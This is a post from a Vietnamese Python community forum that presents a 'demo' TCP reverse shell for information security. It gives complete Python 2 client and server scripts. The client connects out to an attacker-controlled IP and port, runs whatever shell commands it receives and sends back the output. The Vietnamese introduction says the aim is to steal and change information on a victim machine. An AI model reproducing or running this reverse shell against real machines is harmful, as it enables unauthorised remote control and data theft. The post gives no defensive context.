Python for InfoSec: Demo TCP Reverse Shell


  • administrators

    Ví dụ này demo lại quá trình tấn công vào máy nạn nhân và thực hiện các câu lệnh như: ipconfig, dir ... nhằm mục đích đánh cắp và thay đổi thông tin.

    Client

    # Python For Security Pycon.vn
    # Email: khanhnn@pythonvietnam.info
    # Basic TCP Client
    import socket                     # For Building TCP Connection
    import subprocess                 # To start the shell in the system
    def connect():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        # start a socket object 's' 
        s.connect(('172.16.12.95', 8081))                            # Here we define the Attacker IP and the listening port
     
        while True:                                                 # keep receiving commands from the Kali machine
            command =  s.recv(1024)                                 # read the first KB of the tcp socket
            
            if 'terminate' in command:                  # if we got termiante order from the attacker, close the socket and break the loop
                s.close()
                break 
            
            else:                                      # otherwise, we pass the received command to a shell process
                
                CMD =  subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
                s.send( CMD.stdout.read()  ) # send back the result
                s.send( CMD.stderr.read()  ) # send back the error -if any-, such as syntax error
    
    def main ():
        connect()
    main()
    

    Server

    # Python For Security Pycon.vn
    # Email: khanhnn@pythonvietnam.info
    # Simple TCP Server 
    import socket    # For Building TCP Connection
    
    def connect():
        
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # start a socket object 's'
        
        s.bind(("172.16.12.95", 8081))                           # define the kali IP and the listening port
        
        s.listen(1)                                             # define the backlog size, since we are expecting a single connection from a single
                                                                # target we will listen to one connection
        
        print '[+] Listening for incoming TCP connection on port 8080'
        
        conn, addr = s.accept()     # accept() function will retuen the connection object ID (conn) and will return the client(target) IP address and source
                                    # port in a tuple format (IP,port)
        
        print '[+] We got a connection from: ', addr
    
    
        while True:
            
            command = raw_input("Shell> ")   # Get user input and store it in command variable
            
            if 'terminate' in command:       # If we got terminate command, inform the client and close the connect and break the loop
                conn.send('terminate')
                conn.close()
                break
    
            else:
                conn.send(command)    # Otherwise we will send the command to the target
                print conn.recv(1024) # and print the result that we got back
            
    def main ():
        connect()
    main()
    

Hãy đăng nhập để trả lời
 

Có vẻ như bạn đã mất kết nối tới Cộng đồng Python Việt Nam, vui lòng đợi một lúc để chúng tôi thử kết nối lại.